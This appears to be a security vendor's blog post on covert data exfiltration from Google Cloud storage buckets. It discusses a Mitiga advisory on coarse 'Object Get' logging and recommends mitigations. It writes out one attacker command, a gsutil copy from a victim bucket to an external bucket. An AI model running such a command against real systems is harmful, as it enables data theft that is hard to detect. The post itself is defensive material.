With almost 70% of enterprises worldwide using cloud-based infrastructure and more than 90% using cloud services, it’s safe to say that cloud security is one of the most important areas of action in cyber security.
Due to their popularity in the enterprise world, public cloud platforms have, in recent years, transformed into a well-known platform for threat actors to attempt various exploitation methods. As is the case with other cloud platforms, GCP (Google Cloud Platform) is also considered fertile ground with many exploitation possibilities for attackers.
Here’s what you need to know about the recent trend of data exfiltration attacks in GCP:
What are data exfiltration attacks?
Also known as data theft, data exfiltration is one of threat actors’ most common attack vectors, being used immediately after gaining initial access. This attack technique is based on the attacker’s ability to gain control of an Identity and Access Management (IAM) entity within the targeted organization, and then grant permissions to the now-controlled entity, allowing the threat actor to copy data to his GCP organizational data.
Regarding the permissions that GCP grants external accounts for its entities, the cloud platform doesn’t appear to provide the necessary transparency to spot malicious data exfiltration, placing the organization’s crucial data at serious risk of theft.
GCP’s data exfiltration attacks blind spot mechanism
Various data exfiltration techniques in GCP (Google Cloud Platform) have been discovered and are considered to exist due to a “significant forensic security deficiency that enables threat actors to covertly exfiltrate,” as defined by Mitiga in their Security Advisory:
This advisory is part of Mitiga’s research into cloud attacks and forensics, where they attempt to examine potential data exfiltration techniques on cloud platforms such as GCP and the most efficient way to both investigate and identify them.
Since GCP does not provide a sufficient level of visibility in its storage logs (that would allow an effective forensic investigation), organizations using this platform become effectively blind to potential data exfiltration attacks. With these attacks kept unnoticed, an organization will not have the ability to efficiently respond to security incidents, as it stands no chance to correctly and properly assess whether data has been stolen from its systems and, if so, what data exactly it was.
Exploitation of data theft in GCP
The exploitation of these threats is quite simple and doesn’t require either special expertise or highly developed, especially crafted tools.
To obtain the ability to transfer sensitive data from a victim within the organization’s storage buckets to an alternative external storage bucket (the attacker’s organization), the only thing a threat actor would have to do is use Google’s command-line interface with
gsutil cp gs://src_bucket gs://dest_bucket
Doing so, attackers can unnoticeably exfiltrate data in a way that would be extremely difficult to even identify. These undetectability properties and the ease of execution make this exfiltrating data technique a very common and attractive attack for threat actors.
How to protect against GCP data exfiltration attacks
Storage access logs are typically not enabled by default in GCP due to cost considerations. Google Cloud Platform does give its users the option to enable storage access logs, similar to other cloud providers, in order to better monitor and control any potential data theft and organizational data access. Enabling the storage access logs is a first step towards an organization’s ability to efficiently detect and respond to different data or storage related attacks.
However, GCP’s implementation of this system is regrettably insufficient. It appears to produce sizable forensic visibility gaps that make performing a qualitative forensic analysis as well as detection a nearly impossible task. This is caused by deficiencies in an implementation that groups a relatively wide variety of types of both access and read file activities (reading, copying, or downloading a file’s data or metadata to an external server) under one single type of event called “Object Get”.
However, giving organizations using GCP completely detailed information in the organizational logs (such as differentiating between various event types) can easily help address this shortcoming. Here are a few ideas you might take into consideration with regard to how to reduce GCP’s data exfiltration vulnerabilities and support the detection of these attacks:
Restrict access: Access to storage resources must be restricted, and you might also want to consider removing read and/or transfer permissions.
Apply Organization Restriction Headers: Enforced by firewall rules, HTTP headers, and egress proxy configurations, this enables the cloud’s users to restrict cloud resource requests made from within their environments to operate only resources that are owned by pre-selected organizations.
Use VPC Service Controls: To control and manage the communication between Google-managed services, VPC helps Service Controls administrators define a service perimeter for the services’ resources.
Next steps
Each new vulnerability is a reminder of where we stand and what we need to do better. Check out the following resources to help you maintain cyber hygiene and stay ahead of the threat actors:
- VulnRX – vulnerability fix database
- MITRE ATTACK framework – Mapping techniques to CVEs
- Exploit maturity: an introduction
- How to properly tackle zero-day threats
- OWASP Top 10 vulnerabilities 2022: what we learned
And finally…
Don’t get found out by new vulnerabilities. Vulcan Cyber gives you full visibility and oversight of your threat environment and lets you prioritize, remediate and communicate your cyber risk across your entire organization. Get a demo today.
